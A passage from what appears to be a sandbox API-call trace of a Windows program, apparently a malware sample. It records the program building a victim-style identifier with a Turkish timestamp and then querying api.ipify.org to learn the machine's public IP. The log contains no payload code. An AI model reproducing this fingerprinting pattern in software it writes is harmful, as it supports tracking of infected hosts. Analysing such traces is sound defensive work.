returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.243] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] ResetEvent (hEvent=0x3f0) returned 1 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] ResetEvent (hEvent=0x3f0) returned 1 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] SetEvent (hEvent=0x3f4) returned 1 [0102.244] SetEvent (hEvent=0x3f0) returned 1 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] ResetEvent (hEvent=0x3f0) returned 1 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] ResetEvent (hEvent=0x3f0) returned 1 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] SetEvent (hEvent=0x3f4) returned 1 [0102.244] SetEvent (hEvent=0x3f0) returned 1 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.244] ResetEvent (hEvent=0x3f0) returned 1 [0102.244] GetCurrentThreadId () returned 0x1358 [0102.245] GetCurrentThreadId () returned 0x1358 [0102.245] GetCurrentThreadId () returned 0x1358 [0102.245] GetCurrentThreadId () returned 0x1358 [0102.245] ResetEvent (hEvent=0x3f0) returned 1 [0102.245] CloseHandle (hObject=0x3f0) returned 1 [0102.245] CloseHandle (hObject=0x3f4) returned 1 [0102.245] GetCurrentThreadId () returned 0x1358 [0102.245] GetCurrentThreadId () returned 0x1358 [0102.245] GetCurrentThreadId () returned 0x1358 [0102.245] GetCurrentThreadId () returned 0x1358 [0102.245] GetCurrentThreadId () returned 0x1358 [0102.245] GetCurrentThreadId () returned 0x1358 [0102.245] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="shutdown", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0102.245] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="shutdown", cchWideChar=8, lpMultiByteStr=0x247aa6c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shutdown", lpUsedDefaultChar=0x0) returned 8 [0102.246] GetProcAddress (hModule=0x754f0000, lpProcName="shutdown") returned 0x755038a0 [0102.246] shutdown (s=0x3d0, how=1) returned 0 [0102.246] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.246] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x247aa6c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="closesocket", lpUsedDefaultChar=0x0) returned 11 [0102.246] GetProcAddress (hModule=0x754f0000, lpProcName="closesocket") returned 0x75500910 [0102.246] closesocket (s=0x3d0) returned 0 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.247] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] CharUpperBuffW (in: lpsz="MZR-afy4DVkMEyMAayNgWogyzyzIMM20F5FFBRdNJyM3jKFQVFw0Qhk3MNODDzFMJO2VCMCC1CUgM2MUT1TyKRVMCOFTCQWFhCWZWgTB", cchLength=0x68 | out: lpsz="MZR-AFY4DVKMEYMAAYNGWOGYZYZIMM20F5FFBRDNJYM3JKFQVFW0QHK3MNODDZFMJO2VCMCC1CUGM2MUT1TYKRVMCOFTCQWFHCWZWGTB") returned 0x68 [0102.248] CharLowerBuffW (in: lpsz="MZR-afy4DVkMEyMAayNgWogyzyzIMM20F5FFBRdNJyM3jKFQVFw0Qhk3MNODDzFMJO2VCMCC1CUgM2MUT1TyKRVMCOFTCQWFhCWZWgTB", cchLength=0x68 | out: lpsz="mzr-afy4dvkmeymaayngwogyzyzimm20f5ffbrdnjym3jkfqvfw0qhk3mnoddzfmjo2vcmcc1cugm2mut1tykrvmcoftcqwfhcwzwgtb") returned 0x68 [0102.248] CharUpperBuffW (in: lpsz="MZR-afy4DVkMEyMAayNgWogyzyzIMM20F5FFBRdNJyM3jKFQVFw0Qhk3MNODDzFMJO2VCMCC1CUgM2MUT1TyKRVMCOFTCQWFhCWZWgTBVGFyaWgoMTYgTWFydCAyMDIwIFBhemFydGVzaSlfX1NhYXQoMTEtNDAtNTkp", cchLength=0xa4 | out: lpsz="MZR-AFY4DVKMEYMAAYNGWOGYZYZIMM20F5FFBRDNJYM3JKFQVFW0QHK3MNODDZFMJO2VCMCC1CUGM2MUT1TYKRVMCOFTCQWFHCWZWGTBVGFYAWGOMTYGTWFYDCAYMDIWIFBHEMFYDGVZASLFX1NHYXQOMTETNDATNTKP") returned 0xa4 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x24bc3e8, cbMultiByte=45, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0102.248] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x24bc3e8, cbMultiByte=45, lpWideCharStr=0x240dc3c, cchWideChar=45 | out: lpWideCharStr="Tarih(16 Mart 2020 Pazartesi)__Saat(11-40-59)") returned 45 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MZRID96A896E32E__Tarih(16 Mart 2020 Pazartesi)__Saat(11-40-59)", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0102.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MZRID96A896E32E__Tarih(16 Mart 2020 Pazartesi)__Saat(11-40-59)", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0102.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MZRID96A896E32E__Tarih(16 Mart 2020 Pazartesi)__Saat(11-40-59)", cchWideChar=62, lpMultiByteStr=0x24caa98, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MZRID96A896E32E__Tarih(16 Mart 2020 Pazartesi)__Saat(11-40-59)", lpUsedDefaultChar=0x0) returned 62 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.248] GetCurrentThreadId () returned 0x1358 [0102.249] GetLocalTime (in: lpSystemTime=0x19fcc4 | out: lpSystemTime=0x19fcc4*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x3b, wMilliseconds=0x2a2)) [0102.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0102.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0102.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0102.249] GetCurrentThreadId () returned 0x1358 [0102.249] GetCurrentThreadId () returned 0x1358 [0102.249] GetCurrentThreadId () returned 0x1358 [0102.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0102.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PATCH", cchCount2=5) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PATCH", cchCount2=5) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="api.ipify.org", cchCount2=13) returned 1 [0102.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0102.251] socket (af=2, type=1, protocol=0) returned 0x3d0 [0102.251] getsockopt (in: s=0x3d0, level=65535, optname=4104, optval=0x19fb1c, optlen=0x19fb18 | out: optval="\x01", optlen=0x19fb18) returned 0 [0102.251] getsockopt (in: s=0x3d0, level=6, optname=1, optval=0x19fb1c, optlen=0x19fb18 | out: optval="", optlen=0x19fb18) returned 0 [0102.251] setsockopt (s=0x3d0, level=65535, optname=4, optval="", optlen=4) returned 0 [0102.251] htons (hostshort=0x0) returned 0x0 [0102.251] bind (s=0x3d0, addr=0x19fa74*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0102.252] getsockname (in: s=0x3d0, name=0x19fa68, namelen=0x19fae8 | out: name=0x19fa68*(sa_family=2, sin_port=0xc21a, sin_addr="0.0.0.0"), namelen=0x19fae8) returned 0 [0102.252] htons (hostshort=0x1ac2) returned 0xc21a [0102.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="api.ipify.org", cchCount1=13, lpString2="LOCALHOST", cchCount2=9) returned 1 [0102.252] GetAddrInfoW (in: pNodeName="api.ipify.org", pServiceName=0x0, pHints=0x19fb1c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fb3c | out: ppResult=0x19fb3c*=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="50.19.115.217"), ai_next=0xa1e9c8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1d8*(sa_family=2, sin_port=0x0, sin_addr="174.129.223.190"), ai_next=0xa1e9e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c248*(sa_family=2, sin_port=0x0, sin_addr="204.236.231.159"), ai_next=0xa1ec28*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c178*(sa_family=2, sin_port=0x0, sin_addr="23.21.59.179"), ai_next=0xa1ea88*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c218*(sa_family=2, sin_port=0x0, sin_addr="23.21.83.121"), ai_next=0xa1ebe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1e8*(sa_family=2, sin_port=0x0, sin_addr="50.16.245.226"), ai_next=0xa1ec08*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c228*(sa_family=2, sin_port=0x0, sin_addr="184.73.185.65"), ai_next=0xa1ea48*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c168*(sa_family=2, sin_port=0x0, sin_addr="184.73.165.106"), ai_next=0x0))))))))) returned 0 [0102.325] FreeAddrInfoW (pAddrInfo=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="50.19.115.217"), ai_next=0xa1e9c8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1d8*(sa_family=2, sin_port=0x0, sin_addr="174.129.223.190"), ai_next=0xa1e9e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c248*(sa_family=2, sin_port=0x0, sin_addr="204.236.231.159"), ai_next=0xa1ec28*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c178*(sa_family=2, sin_port=0x0, sin_addr="23.21.59.179"), ai_next=0xa1ea88*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c218*(sa_family=2, sin_port=0x0, sin_addr="23.21.83.121"), ai_next=0xa1ebe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1e8*(sa_family=2, sin_port=0x0, sin_addr="50.16.245.226"), ai_next=0xa1ec08*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c228*(sa_family=2, sin_port=0x0, sin_addr="184.73.185.65"), ai_next=0xa1ea48*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c168*(sa_family=2, sin_port=0x0, sin_addr="184.73.165.106"), ai_next=0x0))))))))) [0102.325] htons (hostshort=0x50) returned 0x5000 [0102.325] connect (s=0x3d0, name=0x19facc*(sa_family=2, sin_port=0x50, sin_addr="50.19.115.217"), namelen=16) returned 0 [0102.455] getsockname (in: s=0x3d0, name=0x19fab4, namelen=0x19fb34 | out: name=0x19fab4*(sa_family=2, sin_port=0xc21a, sin_addr="192.168.0.147"), namelen=0x19fb34) returned 0 [0102.455] htons (hostshort=0x1ac2) returned 0xc21a [0102.455] getpeername (in: s=0x3d0, name=0x19fab4, namelen=0x19fb34 | out: name=0x19fab4*(sa_family=2, sin_port=0x50, sin_addr="50.19.115.217"), namelen=0x19fb34) returned 0 [0102.455] htons (hostshort=0x5000) returned 0x50 [0102.455] GetCurrentThreadId () returned 0x1358 [0102.455] GetCurrentThreadId () returned 0x1358 [0102.455] GetCurrentThreadId () returned 0x1358 [0102.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="Accept", cchCount2=6) returned 3 [0102.455] GetCurrentThreadId () returned 0x1358 [0102.455] GetCurrentThreadId () returned 0x1358 [0102.455] GetCurrentThreadId () returned 0x1358 [0102.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="User-Agent", cchCount2=10) returned 1 [0102.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept", cchCount1=6, lpString2="User-Agent", cchCount2=10) returned 1 [0102.456] GetCurrentThreadId () returned 0x1358 [0102.456] GetCurrentThreadId () returned 0x1358 [0102.456] GetCurrentThreadId () returned 0x1358 [0102.456] send (s=0x3d0, buf=0x2445bb8*, len=164, flags=0) returned 164 [0102.456] GetTickCount64 () returned 0x115ae9b [0102.456] select (in: nfds=0, readfds=0x19fa30, writefds=0x0, exceptfds=0x0, timeout=0x0 | out: readfds=0x19fa30, writefds=0x0, exceptfds=0x0) returned 1 [0102.576] recv (in: s=0x3d0, buf=0x2435c68, len=32768, flags=0 | out: buf=0x2435c68*) returned 186 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0", cchCount1=3, lpString2="1.1", cchCount2=3) returned 1 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.1", cchCount1=3, lpString2="1.1", cchCount2=3) returned 2 [0102.576] GetTickCount64 () returned 0x115af18 [0102.576] GetTickCount64 () returned 0x115af18 [0102.576] GetTickCount64 () returned 0x115af18 [0102.576] GetTickCount64 () returned 0x115af18 [0102.576] GetTickCount64 () returned 0x115af18 [0102.576] GetTickCount64 () returned 0x115af18 [0102.576] GetTickCount64 () returned 0x115af18 [0102.576] GetTickCount64 () returned 0x115af18 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Cache-control", cchCount2=13) returned 3 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Cache-control", cchCount2=13) returned 3 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Length", cchCount1=14, lpString2="Cache-control", cchCount2=13) returned 3 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Via", cchCount1=3, lpString2="Cache-control", cchCount2=13) returned 3 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Connection", cchCount2=10) returned 3 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Connection", cchCount2=10) returned 2 [0102.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 1 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Version", cchCount2=15) returned 1 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Length", cchCount1=14, lpString2="Content-Version", cchCount2=15) returned 1 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Via", cchCount1=3, lpString2="Content-Version", cchCount2=15) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 1 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Length", cchCount1=14, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Via", cchCount1=3, lpString2="Content-Disposition", cchCount2=19) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 1 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Length", cchCount1=14, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Via", cchCount1=3, lpString2="Content-Encoding", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 1 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Language", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Length", cchCount1=14, lpString2="Content-Language", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Via", cchCount1=3, lpString2="Content-Language", cchCount2=16) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Type", cchCount2=12) returned 3 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Type", cchCount2=12) returned 1 [0102.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0102.577] GetCurrentThreadId () returned 0x1358 [0102.577] GetCurrentThreadId () returned 0x1358 [0102.577] GetCurrentThreadId () returned 0x1358 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=5, lpString2="text/", cchCount2=5) returned 2 [0102.578] CompareStringW (Locale=0x400, 